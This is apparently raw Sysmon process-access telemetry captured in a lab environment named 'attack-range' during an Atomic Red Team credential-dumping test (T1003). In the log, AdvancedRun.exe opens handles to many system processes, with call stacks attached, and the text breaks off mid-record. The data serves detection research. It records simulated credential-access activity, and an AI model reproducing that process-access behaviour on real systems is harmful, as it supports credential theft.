17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953077Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953076Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953075Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953074Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953073Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953072Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953071Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953070Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953069Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953068Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953067Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953066Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953065Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953064Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953063Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953062Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program 